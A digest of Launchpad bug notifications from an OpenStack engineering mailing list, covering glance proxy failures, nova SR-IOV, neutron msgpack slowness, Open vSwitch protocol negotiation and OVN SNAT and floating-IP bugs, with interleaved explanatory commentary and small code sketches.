whitelisting and blacklist exists for the web-download importer but no proxy configuration. This feels like a feature that needs to go into glance rather than being mashed in by the charm in some way that kinda works/maybe works. ** Changed in: charm-glance Status: New => Incomplete ** Changed in: charm-glance Importance: Undecided => Low ** Also affects: glance Importance: Undecided Status: New ** Changed in: charm-glance Importance: Low => Wishlist -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to Glance. https://bugs.launchpad.net/bugs/1951261 Title: web-download doesn't work in proxied env Status in OpenStack Glance Charm: Incomplete Status in Glance: New Bug description: I'm trying to import an image via the web-download method[0][1]. When kicking off the import process I'm getting this in the glance- api.log 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor Traceback (most recent call last): 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/taskflow/engines/action_engine/executor.py", line 53, in _execute_task 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor result = task.execute(**arguments) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/glance/async_/flows/_internal_plugins/web_download.py", line 116, in execute 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor LOG.error("Task %(task_id)s failed with exception %(error)s", 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/oslo_utils/excutils.py", line 220, in __exit__ 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor self.force_reraise() 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/oslo_utils/excutils.py", line 196, in force_reraise 2021-11-17 
12:50:20.586 24884 ERROR glance.async_.taskflow_executor six.reraise(self.type_, self.value, self.tb) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/six.py", line 703, in reraise 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor raise value 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/glance/async_/flows/_internal_plugins/web_download.py", line 113, in execute 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor data = script_utils.get_image_data_iter(self.uri) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3/dist-packages/glance/common/scripts/utils.py", line 142, in get_image_data_iter 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor return urllib.request.urlopen(uri) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor return opener.open(url, data, timeout) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 525, in open 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor response = self._open(req, data) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 542, in _open 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor result = self._call_chain(self.handle_open, protocol, protocol + 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor result = func(*args) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 1383, in http_open 
2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor return self.do_open(http.client.HTTPConnection, req) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor File "/usr/lib/python3.8/urllib/request.py", line 1357, in do_open 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor raise URLError(err) 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor urllib.error.URLError: 2021-11-17 12:50:20.586 24884 ERROR glance.async_.taskflow_executor The model is situated behind a http proxy. I have set this model-config: juju model-config | grep http-proxy apt-http-proxycontroller http://foo.proxy.host:3128 http-proxydefault "" juju-http-proxy controller http://foo.p
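The traceback shows `get_image_data_iter` calling plain `urllib.request.urlopen(uri)`. By default urllib only discovers a proxy through the process environment (`http_proxy`/`https_proxy`), so if the glance-api service was started without those variables (the juju model-config output above suggests they were only set at the model level), web-download connects directly and fails. A small sketch of both discovery paths, with a made-up proxy hostname:

```python
import os
import urllib.request

# urllib.request.urlopen() consults the *process* environment for proxy
# settings. The proxy URL below is a placeholder, not a real host.
os.environ["http_proxy"] = "http://proxy.example.internal:3128"
proxies = urllib.request.getproxies_environment()

# The programmatic equivalent of exporting the variables: build an
# opener with an explicit ProxyHandler. (Hypothetical usage -- glance
# itself does not do this today, which is the gist of this bug.)
opener = urllib.request.build_opener(
    urllib.request.ProxyHandler({"http": os.environ["http_proxy"]})
)
```

This is why the reporter's suggestion (proxy support belongs in glance itself) amounts to either exporting the variables into the service environment or having glance pass an explicit proxy configuration to its opener.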
[Yahoo-eng-team] [Bug 1892361] Re: SRIOV instance gets type-PF interface, libvirt kvm fails
** Changed in: nova/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1892361 Title: SRIOV instance gets type-PF interface, libvirt kvm fails Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Released Status in OpenStack Compute (nova) rocky series: Fix Released Status in OpenStack Compute (nova) stein series: Fix Released Status in OpenStack Compute (nova) train series: Fix Released Status in OpenStack Compute (nova) ussuri series: Fix Released Status in OpenStack Compute (nova) victoria series: Fix Released Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Focal: Fix Released Status in nova source package in Groovy: Fix Released Status in nova source package in Hirsute: Fix Released Bug description: When spawning an SR-IOV enabled instance on a newly deployed host, nova attempts to spawn it with an type-PF pci device. This fails with the below stack trace. After restarting neutron-sriov-agent and nova-compute services on the compute node and spawning an SR-IOV instance again, a type-VF pci device is selected, and instance spawning succeeds. 
Stack trace: 2020-08-20 08:29:09.558 7624 DEBUG oslo_messaging._drivers.amqpdriver [-] received reply msg_id: 6db8011e6ecd4fd0aaa53c8f89f08b1b __call__ /usr/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:400 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [req-e3e49d07-24c6-4c62-916e-f830f70983a2 ddcfb3640535428798aa3c8545362bd4 dd99e7950a5b46b5b924ccd1720b6257 - 015e4fd7db304665ab5378caa691bb8b 015e4fd7db304665ab5378caa691bb8b] [insta nce: 9498ea75-fe88-4020-9a9e-f4c437c6de11] Instance failed to spawn: libvirtError: unsupported configuration: Interface type hostdev is currently supported on SR-IOV Virtual Functions only 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] Traceback (most recent call last): 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/nova/compute/manager.py", line 2274, in _build_resources 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] yield resources 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/nova/compute/manager.py", line 2054, in _build_and_run_instance 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] block_device_info=block_device_info) 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py", line 3147, in spawn 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] destroy_disks_on_failure=True) 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py", line 5651, in 
_create_domain_and_network 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] destroy_disks_on_failure) 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/oslo_utils/excutils.py", line 220, in __exit__ 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] self.force_reraise() 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/oslo_utils/excutils.py", line 196, in force_reraise 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] six.reraise(self.type_, self.value, self.tb) 2020-08-20 08:29:09.561 7624 ERROR nova.compute.manager [instance: 9498ea75-fe88-4020-9a9e-f4c437c6de11] File "/usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py", line 5620, in _create_domain_and_network 2020-08-20 08:29:09.561 7624 ERROR nova.
[Yahoo-eng-team] [Bug 1937261] Re: python3-msgpack package broken due to outdated cython
python-msgpack promoted to Ussuri updates pocket. ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1937261 Title: python3-msgpack package broken due to outdated cython Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in neutron: New Status in oslo.privsep: New Bug description: After a successful upgrade of the control-plane from Train -> Ussuri on Ubuntu Bionic, we upgraded a first compute / network node and immediately ran into issues with Neutron: We noticed that Neutron is extremely slow in setting up and wiring the network ports, so slow it would never finish and would throw all sorts of errors (RabbitMQ connection timeouts, full sync required, ...) We were now able to reproduce the error on our Ussuri DEV cloud as well: 1) First we used strace -p $PID_OF_NEUTRON_LINUXBRIDGE_AGENT and noticed that the data exchange on the unix socket between the rootwrap-daemon and the main process is really, really slow. One could actually read, line by line, the read calls to the fd of the socket. 2) We then (after adding lots of log lines and other intensive manual debugging) used py-spy (https://github.com/benfred/py-spy) via "py-spy top --pid $PID" on the running neutron-linuxbridge-agent process and noticed all the CPU time (the process was at 100% most of the time) was spent in msgpack/fallback.py 3) Since the issue was not observed in TRAIN we compared the msgpack versions used and noticed that TRAIN was using version 0.5.6 while Ussuri upgraded this dependency to 0.6.2.
4) We then downgraded to version 0.5.6 of msgpack (ignoring the actual dependencies) --- cut --- apt policy python3-msgpack python3-msgpack:   Installed: 0.6.2-1~cloud0   Candidate: 0.6.2-1~cloud0   Version table:  *** 0.6.2-1~cloud0 500 500 http://ubuntu-cloud.archive.canonical.com/ubuntu bionic-updates/ussuri/main amd64 Packages  0.5.6-1 500 500 http://de.archive.ubuntu.com/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status --- cut --- vs. --- cut --- apt policy python3-msgpack python3-msgpack: Installed: 0.5.6-1 Candidate: 0.6.2-1~cloud0 Version table: 0.6.2-1~cloud0 500 500 http://ubuntu-cloud.archive.canonical.com/ubuntu bionic-updates/ussuri/main amd64 Packages *** 0.5.6-1 500 500 http://de.archive.ubuntu.com/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status --- cut --- and, et voilà: the Neutron-Linuxbridge-Agent worked just like before (building one port every few seconds) and all network ports eventually converged to ACTIVE. I could not yet spot which commit of the msgpack changes (https://github.com/msgpack/msgpack-python/compare/0.5.6...v0.6.2) might have caused this issue, but I am really certain that this is a major issue for Ussuri on Ubuntu Bionic. There are "similar" issues with  * https://bugs.launchpad.net/oslo.privsep/+bug/1844822  * https://bugs.launchpad.net/oslo.privsep/+bug/1896734 both related to msgpack or the size of messages exchanged. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1937261/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1937261] Re: python3-msgpack package broken due to outdated cython
** Changed in: cloud-archive Status: New => Confirmed ** Also affects: cloud-archive/ussuri Importance: Undecided Status: New ** Changed in: cloud-archive Status: Confirmed => Invalid ** Changed in: cloud-archive/ussuri Status: New => Triaged ** Changed in: cloud-archive/ussuri Importance: Undecided => Medium ** No longer affects: python-msgpack (Ubuntu) ** No longer affects: python-oslo.privsep (Ubuntu) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1937261 Title: python3-msgpack package broken due to outdated cython Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive ussuri series: Triaged Status in neutron: New Status in oslo.privsep: New Bug description: After a successful upgrade of the control-plane from Train -> Ussuri on Ubuntu Bionic, we upgraded a first compute / network node and immediately ran into issues with Neutron: We noticed that Neutron is extremely slow in setting up and wiring the network ports, so slow it would never finish and would throw all sorts of errors (RabbitMQ connection timeouts, full sync required, ...) We were now able to reproduce the error on our Ussuri DEV cloud as well: 1) First we used strace -p $PID_OF_NEUTRON_LINUXBRIDGE_AGENT and noticed that the data exchange on the unix socket between the rootwrap-daemon and the main process is really, really slow. One could actually read, line by line, the read calls to the fd of the socket. 2) We then (after adding lots of log lines and other intensive manual debugging) used py-spy (https://github.com/benfred/py-spy) via "py-spy top --pid $PID" on the running neutron-linuxbridge-agent process and noticed all the CPU time (the process was at 100% most of the time) was spent in msgpack/fallback.py 3) Since the issue was not observed in TRAIN we compared the msgpack versions used and noticed that TRAIN was using version 0.5.6 while Ussuri upgraded this dependency to 0.6.2.
4) We then downgraded to version 0.5.6 of msgpack (ignoring the actual dependencies) --- cut --- apt policy python3-msgpack python3-msgpack:   Installed: 0.6.2-1~cloud0   Candidate: 0.6.2-1~cloud0   Version table:  *** 0.6.2-1~cloud0 500 500 http://ubuntu-cloud.archive.canonical.com/ubuntu bionic-updates/ussuri/main amd64 Packages  0.5.6-1 500 500 http://de.archive.ubuntu.com/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status --- cut --- vs. --- cut --- apt policy python3-msgpack python3-msgpack: Installed: 0.5.6-1 Candidate: 0.6.2-1~cloud0 Version table: 0.6.2-1~cloud0 500 500 http://ubuntu-cloud.archive.canonical.com/ubuntu bionic-updates/ussuri/main amd64 Packages *** 0.5.6-1 500 500 http://de.archive.ubuntu.com/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status --- cut --- and, et voilà: the Neutron-Linuxbridge-Agent worked just like before (building one port every few seconds) and all network ports eventually converged to ACTIVE. I could not yet spot which commit of the msgpack changes (https://github.com/msgpack/msgpack-python/compare/0.5.6...v0.6.2) might have caused this issue, but I am really certain that this is a major issue for Ussuri on Ubuntu Bionic. There are "similar" issues with  * https://bugs.launchpad.net/oslo.privsep/+bug/1844822  * https://bugs.launchpad.net/oslo.privsep/+bug/1896734 both related to msgpack or the size of messages exchanged. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1937261/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
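The symptom in step 2 above (all CPU time in msgpack/fallback.py) means msgpack was running its pure-Python fallback rather than its compiled extension, which is what "broken due to outdated cython" refers to. A generic, hedged way to check which module actually provides a class — demonstrated here with a stdlib package so it runs anywhere; applying it to msgpack is an assumption about that package's layout:

```python
import importlib

def providing_module(package, class_name):
    """Return the name of the module that actually defines class_name.

    For msgpack (if installed), providing_module("msgpack", "Packer")
    returning "msgpack.fallback" would indicate the slow pure-Python
    path seen in the py-spy output, rather than the compiled extension
    (whose module name varies by msgpack version -- an assumption;
    check the installed package).
    """
    mod = importlib.import_module(package)
    return getattr(mod, class_name).__module__

# Demonstrated with a stdlib package that uses the same re-export
# layout (json re-exports JSONDecoder from json.decoder):
where = providing_module("json", "JSONDecoder")
```

This kind of check would have distinguished "msgpack 0.6.2 is slower" from "msgpack 0.6.2's C extension failed to build against the available cython, so the fallback is in use".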
[Yahoo-eng-team] [Bug 1852221] Re: ovs-vswitchd needs to be forced to reconfigure after adding protocols to bridges
2.15.0 contains the fix for this issue - marking Fix Released. ** Changed in: openvswitch (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1852221 Title: ovs-vswitchd needs to be forced to reconfigure after adding protocols to bridges Status in OpenStack neutron-openvswitch charm: Invalid Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in kolla-ansible: New Status in neutron: New Status in openvswitch: New Status in neutron package in Ubuntu: Fix Released Status in openvswitch package in Ubuntu: Fix Released Status in neutron source package in Eoan: Fix Released Status in neutron source package in Focal: Fix Released Bug description: [Impact] When the neutron native ovs driver creates bridges it will sometimes apply/modify the supported OpenFlow protocols on that bridge. The Open vSwitch versions shipped with Train and Ussuri don't support this, which results in OF protocol mismatches when neutron performs operations on that bridge. The patch we are backporting here ensures that all protocol versions are set on the bridge at the point of create/init. [Test Case] * deploy OpenStack Train * go to a compute host and do: sudo ovs-ofctl -O OpenFlow14 dump-flows br-int * ensure you do not see "negotiation failed" errors [Regression Potential] * this patch ensures that newly created Neutron ovs bridges have OpenFlow 1.0, 1.3 and 1.4 set on them. Neutron already supports these, so no change in behaviour is expected. The patch will not impact bridges that already exist (so will not fix them either if they are affected). -- As part of programming Open vSwitch, Neutron will add to the protocols bridges support [0].
However, the Open vSwitch `ovs-vswitchd` process does not appear to always update its perspective of which protocol versions it should support for bridges: # ovs-ofctl -O OpenFlow14 dump-flows br-int 2019-11-12T12:52:56Z|1|vconn|WARN|unix:/var/run/openvswitch/br-int.mgmt: version negotiation failed (we support version 0x05, peer supports version 0x01) ovs-ofctl: br-int: failed to connect to socket (Broken pipe) # systemctl restart ovsdb-server # ovs-ofctl -O OpenFlow14 dump-flows br-int  cookie=0x84ead4b79da3289a, duration=1.576s, table=0, n_packets=0, n_bytes=0, priority=65535,vlan_tci=0x0fff/0x1fff actions=drop  cookie=0x84ead4b79da3289a, duration=1.352s, table=0, n_packets=0, n_bytes=0, priority=5,in_port="int-br-ex",dl_dst=fa:16:3f:69:2e:c6 actions=goto_table:4 ... (Success) The restart of the `ovsdb-server` process above will make `ovs- vswitchd` reassess its configuration. 0: https://github.com/openstack/neutron/blob/0fa7e74ebb386b178d36ae684ff04f03bdd6cb0d/neutron/agent/common/ovs_lib.py#L281 To manage notifications about this bug go to: https://bugs.launchpad.net/charm-neutron-openvswitch/+bug/1852221/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
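The backported patch described above amounts to pinning all the OpenFlow versions Neutron speaks (1.0, 1.3, 1.4) on the bridge at creation time, so ovs-vswitchd never ends up negotiating only 0x01 as in the failed dump-flows output. A small sketch that only builds the equivalent `ovs-vsctl` argument list (it deliberately does not execute anything; the bridge name is illustrative):

```python
# Sketch: construct the ovs-vsctl command that pins the OpenFlow
# protocol versions on a bridge, matching the behaviour the backported
# neutron patch ensures at bridge create/init time. This only builds
# the argument list; nothing is executed here.

DEFAULT_PROTOCOLS = ("OpenFlow10", "OpenFlow13", "OpenFlow14")

def set_protocols_cmd(bridge, protocols=DEFAULT_PROTOCOLS):
    return [
        "ovs-vsctl", "set", "Bridge", bridge,
        "protocols=" + ",".join(protocols),
    ]

cmd = set_protocols_cmd("br-int")
```

Running the resulting command by hand (`ovs-vsctl set Bridge br-int protocols=OpenFlow10,OpenFlow13,OpenFlow14`) is also a reasonable manual workaround for bridges that already exist, which the backport explicitly does not touch.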
[Yahoo-eng-team] [Bug 1749425] Re: Neutron integrated with OpenVSwitch drops packets and fails to plug/unplug interfaces from OVS on router interfaces at scale
Marking OVS task as invalid as it appears this is a neutron bug related to configuration of VRRP for HA routers. ** Changed in: openvswitch (Ubuntu) Status: Incomplete => Invalid -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1749425 Title: Neutron integrated with OpenVSwitch drops packets and fails to plug/unplug interfaces from OVS on router interfaces at scale Status in neutron: New Status in openvswitch package in Ubuntu: Invalid Bug description: Description: Ubuntu 16.04.3 LTS Release: 16.04 Linux 4.4.0-96-generic on AMD64 Neutron 2:10.0.4-0ubuntu2~cloud0 from Cloud Archive xenial-updates/ocata OpenVSwitch 2.6.1-0ubuntu5.2~cloud0 from Cloud Archive xenial-updates/ocata In an environment with three bare-metal Neutron deployments, hosting upward of 300 routers, with approximately the same number of instances, typically one router per instance, packet loss on instances accessed via floating IPs, including complete connectivity loss, is experienced. The problem is exacerbated by enabling L3HA, likely due to the increase in router namespaces to be scheduled and managed, and the additional scheduling work of bringing up keepalived and monitoring the keepalived VIP. Reducing the number of routers and rescheduling routers on new hosts, causing the routers to undergo a full recreation of namespace, iptables rules, and replugging of interfaces into OVS, will correct packet loss or connectivity loss on impacted routers. On Neutron hosts in this environment, we have used systemtap to trace calls to kfree_skb, which reveals the majority of dropped packets occur in the openvswitch module, notably on the br-int bridge. Inspecting the state of OVS shows many qtap interfaces which are no longer present on the Neutron host but which are still plugged in to OVS. Diagnostic outputs in following comments. 
To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1749425/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1924776] [NEW] [ovn] use of address scopes does not automatically disable router snat
Public bug reported: OpenStack Ussuri OVN 20.03.x Ubuntu 20.04 When multiple networks/subnets are attached to a router which all form part of the same subnet pool and associated address scope, SNAT is not automatically disabled to support routing between the subnets attached to the router. Ensuring the router is created with SNAT disabled resolves this issue, but that's an extra non-obvious step for a cloud admin/end user. ** Affects: neutron Importance: Undecided Status: New ** Affects: neutron (Ubuntu) Importance: Undecided Status: New ** Also affects: neutron (Ubuntu) Importance: Undecided Status: New ** Summary changed: - [ovn] use of address scopes does not automatically disable snat + [ovn] use of address scopes does not automatically disable router snat -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1924776 Title: [ovn] use of address scopes does not automatically disable router snat Status in neutron: New Status in neutron package in Ubuntu: New Bug description: OpenStack Ussuri OVN 20.03.x Ubuntu 20.04 When multiple networks/subnets are attached to a router which all form part of the same subnet pool and associated address scope, SNAT is not automatically disabled to support routing between the subnets attached to the router. Ensuring the router is created with SNAT disabled resolves this issue, but that's an extra non-obvious step for a cloud admin/end user. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1924776/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1922089] Re: [ovn] enable_snat cannot be disabled once enabled
** Also affects: neutron Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1922089 Title: [ovn] enable_snat cannot be disabled once enabled Status in neutron: New Status in neutron package in Ubuntu: New Bug description: Hi, Using Openstack focal/ussuri - ovn version 20.03.1-0ubuntu1.2 and neutron 2:16.2.0-0ubuntu2. If "enable_snat" is enabled on an external gateway on a router, it's not possible to disable it without completely removing said gateway from the router. For example : I have a subnet called subnet_axino_test - 10.0.100.0/24 I run the following : $ openstack router create router_axino_test $ openstack router set --disable-snat --external-gateway net_stg-external router_axino_test $ openstack router add subnet router_axino_test subnet_axino_test And so on OVN, I get nothing : $ sudo ovn-nbctl list NAT |grep -B5 -A4 10.131.100.0/24 Now, I enable SNAT : $ openstack router set --enable-snat --external-gateway net_stg-external router_axino_test This correctly adds an OVN SNAT entry as follows : $ sudo ovn-nbctl list NAT |grep -B5 -A4 10.131.100.0/24 _uuid : a65cc4b8-14ae-4ce4-b274-10eefdcc51dc external_ids: {} external_ip : "A.B.C.D" external_mac: [] logical_ip : "10.131.100.0/24" logical_port: [] options : {} type: snat Now, I remove SNAT from the router : $ openstack router set --disable-snat --external-gateway net_stg-external router_axino_test I confirm this : $ openstack router show router_axino_test | grep enable_snat | external_gateway_info | {"network_id": "4fb8304e-7adb-4cc3-bae5-deb968263eb0", "external_fixed_ips": [{"subnet_id": "6d47-1e44-41af-8f64-dd802d5c3ddc", "ip_address": "A.B.C.D"}], "enable_snat": false} | Above, you can see that "enable_snat" is "false". So I would expect OVN to _not_ have a NAT entry. 
Yet, it does : $ sudo ovn-nbctl list NAT |grep -B5 -A4 10.131.100.0/24 _uuid : a65cc4b8-14ae-4ce4-b274-10eefdcc51dc external_ids: {} external_ip : "162.213.34.141" external_mac: [] logical_ip : "10.131.100.0/24" logical_port: [] options : {} type: snat The only way to remove SNAT is to completely remove the external gateway from the router, and to re-add it with SNAT disabled : $ openstack router unset --external-gateway router_axino_test $ openstack router set --disable-snat --external-gateway net_stg-external router_axino_test Note that this requires removing all the floating IPs from VMs behind this router, which obviously makes them unreachable - which is less than ideal in production. Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1922089/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1924765] [NEW] [ovn] fip assignment to instance via router with snat disabled is broken
Public bug reported: Ubuntu: 20.04 OpenStack: Ussuri Networking: OVN (20.03.x) Network topology: Geneve overlay network for project networks, router has snat disabled and the project network and the external network are all in the same address scope and subnet pool. OVN routers are simply acting as L3 routers and instances on the project network can be directly accessed by the address assigned to their port (with appropriate route configuration in the outside-of-OpenStack world). Issue: It's possible to create and then associate a floating IP on the external network with an instance attached to the project network - however this does not work - access to the instance via the FIP is broken, as is access to its fixed IP (which worked before). Thoughts: The concept of a FIP is very much NAT centric, and in the described configuration NAT is very much disabled. This idea seems to have worked way back in icehouse, however does not work at Ussuri. If this is not a supported network model, the association of the FIP with the instance should error with an appropriate message that NAT is not supported on the in-path router to the external network. ** Affects: neutron Importance: Undecided Status: New ** Affects: neutron (Ubuntu) Importance: Undecided Status: New ** Summary changed: - [ovn] fip assignment to router with snat disabled broken + [ovn] fip assignment to instance via router with snat disabled is broken ** Description changed: + Ubuntu: 20.04 + OpenStack: Ussuri + Networking: OVN (20.03.x) + Network topology: Geneve overlay network for project networks, router has snat disabled and the project network and the external network are all in the same address scope and subnet pool. OVN routers are simply acting as L3 routers and instances on the project network can be directly accessed by the address assigned to their port (with appropriate route configuration in the outside-of-OpenStack world). 
Issue: It's possible to create and then associate a floating IP on the external network with an instance attached to the project network - however this does not work - access to the instance via the FIP is broken, as is access to its fixed IP (which worked before). Thoughts: The concept of a FIP is very much NAT centric, and in the described configuration NAT is very much disabled. This idea seems to have worked way back in icehouse, however does not work at Ussuri. If this is not a supported network model, the association of the FIP with the instance should error with an appropriate message that NAT is not supported on the in-path router to the external network. ** Also affects: neutron Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1924765 Title: [ovn] fip assignment to instance via router with snat disabled is broken Status in neutron: New Status in neutron package in Ubuntu: New Bug description: Ubuntu: 20.04 OpenStack: Ussuri Networking: OVN (20.03.x) Network topology: Geneve overlay network for project networks, router has snat disabled and the project network and the external network are all in the same address scope and subnet pool. OVN routers are simply acting as L3 routers and instances on the project network can be directly accessed by the address assigned to their port (with appropriate route configuration in the outside-of-OpenStack world). Issue: It's possible to create and then associate a floating IP on the external network with an instance attached to the project network - however this does not work - access to the instance via the FIP is broken, as is access to its fixed IP (which worked before). Thoughts: The concept of a FIP is very much NAT centric, and in the described configuration NAT is very much disabled. This idea seems to have worked way back in icehouse, however does not work at Ussuri. 
If this is not a supported network model, the association of the FIP to the instance should error with an appropriate message that NAT is not supported on the in-path router to the external network. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1924765/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
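The error-instead-of-silent-breakage behaviour suggested above can be sketched as a simple validation step. This is a hypothetical illustration, not Neutron's actual FIP association code path; the function and exception names are invented:

```python
# Hypothetical sketch: refuse a floating-IP association when the
# gateway router has SNAT disabled, instead of silently breaking
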